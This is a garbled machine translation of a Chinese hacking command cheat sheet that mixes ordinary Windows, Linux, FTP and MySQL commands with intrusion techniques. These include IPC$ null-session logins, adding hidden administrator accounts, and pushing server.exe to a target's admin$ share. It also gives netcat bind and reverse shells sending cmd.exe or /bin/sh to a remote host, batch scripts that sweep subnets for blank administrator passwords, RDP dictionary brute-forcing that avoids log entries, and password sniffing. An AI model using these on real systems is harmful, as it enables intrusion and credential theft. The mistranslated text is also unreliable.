NET use \\ip\ipc$ ""/user: "" to establish an IPC NULL link
NET use \\ip\ipc$ "password"/user: "User name" to establish IPC non-null link
NET use h: \\ip\c$ "password"/user: "username" direct login after mapping each other C: to local for
H:
NET use H: \\ip\c$ to map each other after landing C: to local for H:
NET use \\ip\ipc$/del Delete IPC links
NET use H:/del to remove mappings to map each other to the local H:
NET user username password/add set up users
NET user Guest/active:yes activate Guest user
NET user to see which users
NET user account name view the properties of the account
net localgroup Administrators user name/add Add "users" to the administrator so that they
With administrator privileges, note: After the administrator, add s to the plural
net start to see which services are turned on
Net start service name (such as: net start Telnet, net start schedule)
NET stop service name stops a service
NET time \ Target IP View each other
NET time \ \ target Ip/set set the local computer time to synchronize with the destination IP host, plus
/yes on parameter to cancel confirmation information
NET view to see which shares are open in the local LAN
NET view \\ip see which shares are open on each other's local area network
NET config display system network settings
NET logoff disconnected sharing
NET Pause Service name pauses a service
NET send IP "text information" sends messages to each other
NET ver network connection types and information in use within the LAN
NET share to view locally opened shares
NET share ipc$ open ipc$ sharing
NET share ipc$/del Delete ipc$ share
NET share $/del Delete C: Sharing
NET user Guest 12345 login with guest user to change password to 12345
NET password Password change system login password
Netstat-a See which ports are turned on, commonly used Netstat-an
Netstat-n View the network connection of the port, commonly used Netstat-an
Netstat-v View work in progress
NETSTAT-P protocol Name Example: Netstat-p TCQ/IP View the usage of a protocol (view TCP/IP
Use of Protocol)
Netstat-s View all protocol usage in use
Nbtstat-a IP each other 136 to 139 one of the ports opened, you can view the latest landing
Username (user name before 03)-Note: parameter-A is to be capitalized
Tracert-parameter IP (or computer name) trace route (packet), Parameter: "-W number" for
The timeout interval is placed.
Ping IP (or domain name) to the other host to send the default size of 32 bytes of data, parameters: "-l[space"
Packet size; "-N Send Data Count"; "-T" means ping all the time.
PING-T-l 65550 IP death ping (sending files larger than 64K and Ping is the death
Ping
Ipconfig (winipcfg) for Windows NT and XP (Windows 95 98) To view the local IP address.
Ipconfig available parameter "/all" to display all configuration information
TLIST-T Displays the process as a tree row table (additional tools for the system, default is not installed, in the installation
Directory within the Support/tools folder)
Kill-f the process name with the-f argument to force the end of a process (for the System Add-on tool, default is no Ann
installed, in the Support/tools folder of the installation directory)
Del-f file name plus-F parameter to delete read-only files,/ar,/ah,/as,/AA, respectively, to delete
Read-only, hidden, system, archive files,/a-r,/a-h,/a-s,/a-a indicate deletion except read-only, hidden
, systems, files outside the archive. For example, "Del/ar *.*" means deleting all read-only text in the current directory
, "Del/a-s *.*" means to delete all files except the system files under the current directory
DEL/S/q directory or use: rmdir/s/q directory/S to delete all subdirectories and directories under the directory and
File. Use parameter/q to cancel the system confirmation when the delete operation is removed. (Two orders made
With the same)
Move letter \ path \ file name to be moved move file path \ move file filename
, use parameter/y to override the prompt to cancel the confirmation that the same file exists in the mobile directory
FC One.txt Two.txt > 3st.txt compares two files and outputs differences to 3st.txt files
, ">" and "> >" are redirection commands
An at ID number to open a registered scheduled task
At/delete Stop all scheduled Tasks,/yes with parameters without confirmation and stop directly
At ID number/delete stop a registered scheduled task
At View all scheduled tasks
At \\IP time program name (or a command)/R run the other program at some point and restart the calculation
Machine
Finger username @host See which users have recently logged in
Telnet IP port remote and login server, default port is 23
Open IP connection to IP (the command after Telnet login)
Telnet on this computer, type telnet directly into the native Telnet
Copy path \ filename 1 path \ filename 2/y copy file 1 to the specified directory as file 2, with parameters
/y Also cancels the confirmation that you want to overwrite an existing directory file
Copy c:\srv.exe \\ip\admin$ replicate local c:\srv.exe to each other under admin
Cppy 1st.jpg/b+2st.txt/a 3st.jpg to hide 2st.txt content into 1st.jpg
3st.jpg new file, Note: 2st.txt file header to empty three rows, parameters:/b refers to binary files,/a refers to
ASCLL format File
Copy \\ip\admin$\svv.exe C:\ Or: copy\\ip\admin$\*.* copy each other admini$ share
Srv.exe file (all files) to local C:
xcopy to copy file or directory tree destination address \ directory name copy file and directory tree, with parameters/y
will not be prompted to overwrite the same file
Tftp-i own IP (using a meat machine as a springboard for this with a meat machine IP) get Server.exe c:\server.exe
After landing, the "IP" Server.exe download to the target host C:\server.exe parameters:-I refers to two
In-mode transfer, such as the transfer of EXE file, if not plus-I in ASCII mode (transfer text file mode
Type) for transmission
Tftp-i each other IP put c:\server.exe login, upload local c:\server.exe to host
The FTP IP port is used to upload files to the server or file operations, with the default port of 21. Bin refers to the use of two
Transfer (executable file in) in the form of the default for ASCII format transfer (when text files)
Route print shows IP routing, which will mainly display network address network addres, subnet mask
Netmask, gateway address Gateway Addres, interface address interface
ARP view and handle ARP cache, ARP is the meaning of name parsing, responsible for the resolution of an IP into a physical
The MAC address of the sex. ARP-A will show all the information
Start Program name or command/max or/min new window opens and maximizes (minimizes) running a certain path
Order or Order
Mem View CPU Usage
attrib file name (directory name) to view the properties of a file (directory)
attrib filename-a-r-s-h or +a +r +s +h Remove (add) archive of a file, read only
, System, hide attribute, or add as a property with +
Dir view file, Parameters:/q Display file and directory belong to system which user,/T:C display file creation
,/t:a shows the last time the file was accessed,/t:w the last time it was modified
date/t, time/t using this parameter, "date/t", "time/t" will display only the current date and
Time without having to enter a new date and time
Set Specify environment variable name = character to assign to variable set environment variable
Set shows all current environment variables
Set P (or other character) displays all environment variables that are currently beginning with the character P (or other character)
Pause suspends the batch program and displays: Press any key to continue ....
If conditional processing is performed in a batch program (more on See if command and variable)
The goto label directs cmd.exe to tagged rows in a batch program (the label must be a single line and
Colon begins, for example: ": Start" label)
Call path \ batch file name calls another batch program from the batch program (see more
Call/?)
For executing a specific command for each file in a set of files (see for command and variable for more)
echo on or off turns echo on or off and displays the current ECHO setting only with echo without arguments
The echo message displays information on the screen
Echo Information >> pass.txt saves "information" to a pass.txt file
findstr "Hello" aa.txt find string in aa.txt file Hello
Find file name look for a file
Title Name change cmd window title name
The color color value sets the cmd console foreground and background colors; 0 = black, 1 = blue, 2 = green, 3 = Aqua
, 4 = red, 5= purple, 6 = yellow, 7 = white, 8 = Gray, 9 = blue, a= light green, b= pale green, c= pink,
d= pale violet, e= yellowish, f= bright white
Prompt name change cmd.exe display command prompt (change c:\, d:\ unification to: entsky\)
Print file name printing text file
Ver display version information in a DOS window
Winver Pop-up window displays version information (memory size, system version, patch version, computer name
)
Format Letter/fs: Type format disk, type: FAT, FAT32, NTFS, Example: Format D:
/fs:ntfs
MD Directory Name creation directory
Replace source file to replace the file's directory replacement file
ren original filename New file name rename file name
Tree Displays the table of contents in a TreeView, with the parameter-f lists the name of the file in the first folder
Type filename Displays the contents of a text file
More file name display output file by screen
Doskey the command to be locked = character
Doskey to unlock the command = Lock command provided for DOS (edit the command line, recall the Win2K command,
and create macros). such as: Lock dir command: Doskey Dir=entsky (cannot use Doskey dir=dir);
Unlock: Doskey dir=
Taskmgr pull up the task Manager
chkdsk/f d: Check disk D and Display status reports, add parameter/F, and Repair errors on the disk
tlntadmn telnt service admn, type tlntadmn option 3, and then select 8 to change the Telnet service
Default port 23 is any other port
Exit exits the Cmd.exe program or currently, using the parameter/b is to exit the current batch script instead of the Cmd.exe
The file name of the path path \ Executable file sets a path for the executable file.
CMD starts a win2k command interpretation window. Parameters:/eff,/en off, open command extensions;
See the detailed description of CMD/?
REGEDIT/S registry File name Import registry, parameter/s refers to quiet mode import, without any hint;
regedit/e registry File name Export Registry
cacls filename parameter to show or modify file access control List (ACL)--For NTFS format
。 Parameters:/d user name: Set to deny access to a user;/P user name ERM replaces the access of a specified user
/g user name ERM gives the specified user access rights; Perm can be: N None, R read,
W Write, C Change (write), F complete control; Example: cacls d:\test.txt/d Pub setting
D:\test.txt denied pub user access.
cacls file name to view a list of Access user rights for a file
REM text content Add annotations to batch files
netsh view or change local network configuration
IIS Service Command:
Iisreset/reboot reboot the Win2K computer (but the system will be prompted to restart the information)
Iisreset/start or stop (stops) all Internet services
Iisreset/restart stop and then restart all Internet services
Iisreset/status Show all Internet service status
Iisreset/enable or disable enable (disable) Restart of Internet services on the local system
Move
Iisreset/rebootonerror when the Internet service is started, stopped, or restarted, if the error occurs
Mistakenly reboot the boot
Iisreset/noforce If Internet services cannot be stopped, Internet services will not be forced to terminate
Iisreset/timeout Val still does not stop Internet service when it reaches more than (seconds), if you specify
/rebootonerror parameter, the computer will be powered back on. The preset value is 20 seconds to reboot and 60 seconds to stop.
, reboot for 0 seconds.
FTP command: (detailed instructions later)
The command line format for FTP is:
Ftp-v-d-i-n-g[Host name]-V displays all the response information for the remote server.
-d use debug mode.
-N Restricts automatic logon of FTP, that is, the. netrc file is not used.
-G cancels the global filename.
Help [command] or? [command] View command description
Bye or quit terminates the host FTP process and exits the FTP admin mode.
PWD lists the current remote host directory
Put or send local file name [upload to filename on host] Transfer local file to remote
In the host
Get or recv [remote host filename] [download to local filename] from remote host to
In the local host
Mget [Remote-files] receives a batch of files from the remote host to the local host
Mput Local-files sends a batch of files from the local host to the remote host
dir or LS [remote-directory] [local-file] lists the files in the current remote host directory.
If a local file is available, the result is written to a local file
ASCII settings transfer files in ASCII (default)
Bin or image settings to transfer files in binary mode
Bell every time you complete a file transfer, alarm prompt
Cdup return to the previous level of directory
Close interrupts the FTP session with the remote server (corresponding to open)
Open Host[port] Establishes a connection to the specified FTP server, which specifies the connection port
Delete deletes files from the remote host
Mdelete [Remote-files] Delete a batch of files
mkdir directory-name Create a directory in the remote host
Rename [from] [to] change the file name in the remote host
RmDir directory-name Deletes a directory in the remote host
Status Displays the current FTP state
system displays remote host systems type
User user-name [Password] [account] re-logged on to the remote host with another user name
Open host [port] re-establish a new connection
Prompt interactive hint mode
MACDEF Define Macros Command
LCD changes the current local host's working directory, if default, go to the current user's home directory
chmod change file permissions on remote hosts
Case when on, copy the filename with the mget command to the local machine and convert all lowercase letters
CD Remote-dir into remote host directory
Cdup into the parent directory of the remote host directory
! Perform interactive shell,exit in the local machine back to the FTP environment, such as!ls*.zip
MYSQL command:
Mysql-h host Address-u username-p password is connected to MySQL; If you just installed MySQL, super user
Root does not have a password.
(Example: mysql-h110.110.110.110-uroot-p123456
Note: U and root can be without spaces, others are the same.
Exit out of MySQL
Mysqladmin-u username-p Old password Password new password modify password
Grant SELECT on database. * To User name @ login host identified by \ "Password \"; Increase
Add new users. (Note: Unlike the above, the following are the commands in the MySQL environment, so the back
With a semicolon as the command Terminator)
show databases; Displays a list of databases. Only two databases were initially: MySQL and test.
MySQL Library is very important it has MySQL system information, we change the password and new users, is actually
Use this library for operation.
Use MySQL;
Show tables; Display data tables in a library
describe table name; Display the structure of a datasheet
Create database library name; Build a library
Use library name;
CREATE TABLE table name (field set list);
drop Database library name;
drop table name, delete and delete table
Delete from table name; Empty records in a table
SELECT * from table name; Show records in a table
mysqldump--opt school>school.bbb Backup database: (Command in DOS \\mysql\\bin
directory); Note: Back up the database school to the school.bbb file, SCHOOL.BBB is a
Text file, file name, open and see what you'll find.
New commands under Win2003 System (practical part):
Shutdown/parameter shuts down or restarts a local or remote host.
Parameter description:/S shutdown host,/R reboot host,/T number set delay time, range 0~180
Between seconds,/a cancels the boot,/M//IP specifies the remote host.
Example: SHUTDOWN/R/T 0 reboot the local host immediately (no delay)
Taskill/parameter process name or process PID terminates one or more tasks and processes.
Parameter description:/pid to terminate the process of PID, the tasklist command can be used to obtain the pid,/im of the process
The process name of the terminated process,/F force terminate process,/T terminate the specified process and the Zijin that he started
Ride.
TASKLIST displays process headers for processes, services, and services that are currently running on local and remote hosts
Recognition character (PID).
Parameter description:/M lists DLL files loaded by the current process,/svc shows the service corresponding to each process,
Only the current process is listed when there are no parameters.
Basic commands for Linux systems: to be case-sensitive
Uname display version information (ver with Win2K)
DIR Displays the current directory file, Ls-al display includes hidden files (same as Win2K dir)
PWD the directory location where the query is currently located
CD CD.. Go back to the previous level of the directory, note that CD with ... There are spaces between. CD/Go back to the root directory.
Cat file name view file contents
Cat >abc.txt the contents to the Abc.txt file.
More filename displays a text file as one page.
CP Copy Files
MV Mobile File
RM filename Delete file, rm-a directory name delete directory and subdirectories
mkdir Directory Name build directory
RmDir deletes subdirectories, there are no documents in the directory.
chmod set access rights to files or directories
Grep finds a string in the file
Diff Archive file Comparison
Find File Search
Date and time of date now
Who queries the person who currently uses the same machine as you and the login time and place
W Query the details of the current person on the machine
WhoAmI to view your account name
Groups view someone's group
passwd Change Password
History See the commands you've been under.
PS Display process Status
Kill stops a process
GCC hackers usually use it to compile files written in C language.
The SU permission converts to the specified consumer
Telnet IP Telnet connects to the other host (with Win2K), indicating that the connection was successful when the bash$ occurred.
FTP FTP connection on a server (same Win2K)
Attached: Batch processing commands and variables
1:for command and variable basic format:
For/Parameter%variable in (set) do command [Command_parameters]%variable:
Specifies a single-letter replaceable parameter, such as:%i, while specifying a variable with:%%i, and calling
Variable is used:%i%, the variable is case-sensitive (%i is not equal to%i).
The batch process can handle a total of 10 variables per%0-%9, where%0 defaults to the batch file name,%1
The default is the first value entered when using this batch, and similarly:%2-%9 refers to the input of the 第2-9个 value;
: NET use \\ip\ipc$ pass/user:user IP is%1,pass%2, user is%3
(SET): Specifies a file or set of files that can be used with wildcards such as: (D:\user.txt) and (1 1 254) (1
-1 254), {"(1 1 254)" The first "1" refers to the starting value, the second "1" refers to the amount of growth, the third "254"
Refers to the end value, that is: from 1 to 254; "(1-1 254)" Description: From 254 to 1}
Command: Specifies the commands that are executed on the first file, such as the net use command, or when multiple commands are executed
, order this extra:& to separate
Command_parameters: Specify a parameter or command-line switch for a specific command
In (set): means to take a value in (set); a do command: a command
Parameters:/L refers to the increment form {(set) as an increment};/f refers to the constant value from the file until the
When {(set) is a file, such as (D:\pass.txt)}.
Use examples:
@echo off
echo usage format: Test.bat *.*.* > Test.txt
FOR/L%%g in (1 1 254) does echo%1.%%g >>test.txt & net use \\%1.%%g
/user:administrator | Find "command completed successfully" >>test.txt
Save as Test.bat Description: Try to establish an administrator for the 254 IP of a specified class C segment
The password is an empty ipc$ connection, and if successful, the IP exists in the test.txt.
/L refers to the increment form (that is, from 1-254 or 254-1); The first three bits of IP input: *.*.* default for batch processing
%1;%%g is the variable (last IP);& used to separate the echo and net use of the two commands;
| After establishing the ipc$, find out in the results to see if there is a "command successfully completed" message;%1.%%g
The complete IP address, (1 1 254) is the starting value, the growth rate, the stop value.
@echo off
echo Usage format: Ok.bat IP
for/f%%i in (D:\user.dic) do smb.exe%1%%i D:\pass.dic 200
Save As: Ok.exe Description: Input an IP, using a dictionary file d:\pass.dic to solve D:\user.dic
Until the value in the file is finished. %%i is the user name;%1 is the IP address entered (the default
)。
2:if command and variable basic format:
If [NOT] errorlevel a numeric command statement if the program runs the last return of an equals or greater-than point
The exit encoding for the specified number, specifying the condition as true.
Example: if errorlevel 0 command means that the value returned after the execution of the program is 0 o'clock, and the command after the value line;
If not errorlevel 1 command means that the last value returned by the program execution is not equal to 1, the following command is executed
。
0 refers to the discovery and successful execution (true); 1 means no discovery, no execution (false).
If [not] string 1== string 2 command statement if the specified text string matches (that is, the string
1 equals string 2), executes the following command.
Example: "If"%2% "= =" 4 "goto start" means: If the second variable entered is 4 o'clock, perform the following
Command (note: When calling a variable, the% variable name plus "")
If [NOT] EXIST filename command statement executes the following command if the specified filename exists.
Example: "If not nc.exe goto end" means: If the Nc.exe file is not found, skip to the ":" Sign
To sign the place.
If [NOT] errorlevel numeric command statement Else command statement or if [not] string 1== Word
String 2 Command Statement Else command statement or IF [not] exist file name Command statement else command
Statement Plus: Else command statement after refers to: the current face of the condition is not established, it refers to the life of the following else
Make. Note: Else must be valid with if on the same line. When Del command is available, all Del commands are required.
Content is enclosed in < > because the del command is to be executed on a separate line, with < > as a separate
Line; For example: "If exist test.txt. else Echo
Test.txt.missing ", Notice the". "In the command.
(b) System external commands (all need to download the relevant tools):
1. Swiss Army Knife: Nc.exe
Parameter description:
-H View Help information
-D Background mode
-e Prog program redirection, once a connection is performed [dangerous]
-I secs delay interval
-L listening mode for inbound connections
-L listening mode, connecting to continue listening after the day is closed until Ctr+c
-N IP address, cannot use domain name
-O film record 16 incoming transmissions
-p[Space] Port local port number
-R random Local and remote ports
-T use telnet interactive mode
-U UDP mode
-v verbose output, with-VV will be more detailed
-W Digital Timeout delay interval
-Z turns input, output off (for sweep anchor)
Basic usage:
NC-NVV 192.168.0.1 80 connects to the 192.168.0.1 host's 80 port
Nc-l-p 80 turns on native TCP 80 ports and listens
Nc-nvv-w2-z 192.168.0.1 80-1024 sweep anchor 192.168.0.1 80-1024 Port
The Cmdshell of the Nc-l-P 5354-t-e c:winntsystem32cmd.exe bound remote host
Remote TCP 5354 Port
NC-T-E c:winntsystem32cmd.exe 192.168.0.2 5354-bang-Set remote host
Cmdshell and reverse-connect 192.168.0.2 5354 ports
Advanced usage:
Nc-l-P 80 as a honeypot with 1: Open and keep listening to the 80 port until Ctr+c
Nc-l-p > C:\log.txt as a honeypot 2: Open and keep listening to 80 ports until
Ctr+c, while outputting the results to C:\log.txt
Nc-l-P < c:\honeyport.txt as honeypot 3-1: open and constantly monitor 80 ports,
Until Ctr+c, and the contents of the C:\honeyport.txt into the pipeline, can play a role in the transfer of files
Type.exe C:\honeyport | Nc-l-P 80 as a honeypot with 3-2: Open and keep listening to the 80-port
Port, until the ctr+c, and the contents of the C:\honeyport.txt into the pipeline, can play a role in the transfer of files
On-Machine use: nc-l-P native Port
On the other host: nc-e Cmd.exe native ip-p native Port *win2k
Nc-e/bin/sh native Ip-p native port *linux,unix Reverse connection break the fire of the other host
Wall
On-Machine use: nc-d-l-p Port < path and name of file to be transferred
On the other host: NC-VV native IP Native port > location file path and name transfer file
To the other host
Notes
| Pipe command
< or > redirection commands. "<", for example: tlntadmn < test.txt refers to the contents of Test.txt
Assign value to tlntadmn command
@ indicates execution of the command after @ but will not be displayed (background execution); Example: @dir C:\Winnt
>> d:\log.txt means: Run dir in the background and put the result in D:\log.txt
The difference between > and >> ">" means: Overwrite; ">>" means: Save to (add to).
such as: @dir C:\Winnt >> d:\log.txt and @dir c:\winnt > d:\log.txt two orders respectively
Perform two comparisons: Use >> to save the results of two times, but only once with:>
, because the second result is the first one to cover.
2, Sweep anchor tool: Xscan.exe
Basic format
Xscan-host < start ip>[-< termination ip>] < inspection project > [Other options] Sweep anchor "Start IP to terminate
All host information for the IP segment
Xscan-file < host list filename > < detection project > [Other options] sweep anchor "Host IP list file
All host information in the name "
Test items
-active detects if the host is alive
-os detects remote operating system types (via NetBIOS and SNMP protocol)
-port detects port status of common services
-ftp Detect FTP Weak password
-pub detect the FTP service anonymous user write permission
-POP3 Detection pop3-server Weak password
-SMTP Detection Smtp-server Vulnerability
-sql Detection sql-server Weak password
-SMB Detection nt-server Weak password
-iis detects IIS encoding/decoding vulnerabilities
-CGI detect CGI Vulnerabilities
-NASL Load Nessus Attack script
-all detect all of the above items
Other options
-I adapter number set network adapter, < adapter number > can be obtained by the "-L" parameter
-L Display all network adapters
-V Display verbose scan progress
-P skips a host that does not respond
-O skips a host that does not have an open port detected
-T concurrent threads number, concurrent host number specifies the maximum number of concurrent threads and the number of concurrent hosts, the default
Recognition quantity is 100,10
-log filename Specifies the scan report file name (suffix: TXT or HTML format file)
Usage examples
Xscan-host 192.168.1.1-192.168.255.255-all-active-p Detection
192.168.1.1-192.168.255.255 all vulnerabilities within the network segment, skipping host without response
Xscan-host 192.168.1.1-192.168.255.255-port-smb-t 150-o Detection
192.168.1.1-192.168.255.255 the standard port status of the host in the network segment, NT weak password user, maximum
The number of concurrent threads is 150, skipping hosts with no open ports detected
Xscan-file hostlist.txt-port-cgi-t 200,5-v-o detection "hostlist.txt"
Standard port status for all hosts listed in the file, CGI vulnerabilities, maximum concurrent threads number 200, same
Detect up to 5 hosts at a time, show detailed detection progress, skip hosts that do not have an open port detected
3, the command line type sniffer: Xsniff.exe
Can capture the Ftp/smtp/pop3/http protocol password in LAN
Parameter description
-TCP Output TCP Datagram
-UDP output UDP Datagram
-ICMP output ICMP datagram
-pass Filter Password information
-hide Background Run
-host Resolve host Name
-ADDR IP address Filter IP address
-port Port Filter Port
-log file name output save to file
-ASC output in ASCII form
The-hex is output in 16 binary form
Usage examples
Xsniff.exe-pass-hide-log Pass.log the background to run the sniffer password and save the password information in the
In the Pass.log file
Xsniff.exe-tcp-udp-asc-addr 192.168.1.1 sniffing 192.168.1.1 and filtering TCP and
UDP information and output in ASCII format
4, Terminal Services password cracking: Tscrack.exe
Parameter description
-H Display Use Help
-V Display version information
-s ability to decrypt on screen
-B sound when a bad password is made
-T is issued multiple connections (multithreading)
-N Prevent System Log entries on targeted server
-u uninstall tscrack removal component
-F uses the password behind-F
-F time interval (frequency)
-L using the user name after-l
-W Use password dictionary behind-W
-P uses the password after-p
-D Login Home Page
Usage examples
Tscrack 192.168.0.1-l administrator-w pass.dic remote password dictionary file burst
Login password for the host's administrator
Tscrack 192.168.0.1-l administrator-p 123456 remote login with password 123456
192.168.0.1 User of the administrator
@if not exist Ipcscan.txt Goto Noscan
@for/F "Tokens=1 delims="%%i in (3389.txt) does call Hack.bat%%i
Nscan
@echo 3389.txt no find or scan faild
(① Save As 3389.bat) (assuming that existing superscan or other sweeping anchors are swept to a batch of 3389 main
Machine IP list file 3389.txt)
3389.bat means: Take an IP from the 3389.txt file, then run the Hack.bat
@if not exist Tscrack.exe Goto Noscan
@tscrack%1-l administrator-w pass.dic >>rouji.txt
: Noscan
@echo Tscrack.exe no find or scan faild
(② Save As Hack.bat) (run 3389.bat on OK, and 3389.bat, Hack.bat, 3389.txt,
Pass.dic and Tscrack.exe in the same directory; You can wait for the result.
Hack.bat means: Run Tscrack.exe use dictionary to burst all the hosts in 3389.txt
Administrator password and save the cracked results in the Rouji.txt file.
5. Other:
Shutdown.exe
Shutdown \\IP address t:20 20 seconds to automatically close the opponent NT (Windows 2003 System self-tool
, you need to download the tool to use it in Windows2000. In the previous Windows 2003 DOS command
have detailed introduction. )
The Fpipe.exe (TCP port Redirection tool) is described in detail in the second article (Port redirection bypasses fire
Wall
Fpipe-l 80-s 1029-r [Url]www.sina.com.cn[/url] When someone sweeps your 80-port, he sweeps
The results will be entirely [Url]www.sina.com.cn[/url] host information
Fpipe-l 23-s 88-r 23 Destination IP sends native to destination IP 23 port telnet request via end
After the Koko is directed, it is sent via Port 88 to the 23 port of the destination IP. (When creating Telnet with the destination IP
The machine is connected with the 88 port and then: direct telnet 127.0.0.1 (native IP) is connected to
23 Port for Destination IP.
OpenTelnet.exe (Remote open Telnet tool)
Opentelnet.exe \\IP account password NTLM authentication mode telnet port (no upload required)
Ntlm.exe destroys Microsoft's authentication method) directly remotely opens each other's Telnet service, which is available
Telnet \\ip Connect to the other side.
NTLM authentication mode: 0: Do not use NTLM authentication; 1: Try NTLM authentication first, if failed
, and then use the username and password; 2: Only NTLM authentication is used.
ResumeTelnet.exe (another tool shipped with opentelnet)
Resumetelnet.exe \\IP account password with Telnet connection after each other, use this command will
The other's Telnet settings are restored, and the Telnet service is also turned off.
6, FTP command detailed:
The FTP command is one of the most frequently used commands for Internet users, and is familiar with and flexibly applies the internal commands of FTP
, can greatly facilitate the user, and received a multiplier effect. If you want to learn to use the background FTP under
, then you must learn the FTP instructions.
The command line format for FTP is:
Ftp-v-d-i-n-g [host name], where
-V Displays all response information for the remote server;
-N Restricts automatic logon of FTP, that is, not using;. n etrc files;
-D use debugging mode;
-G cancels global filename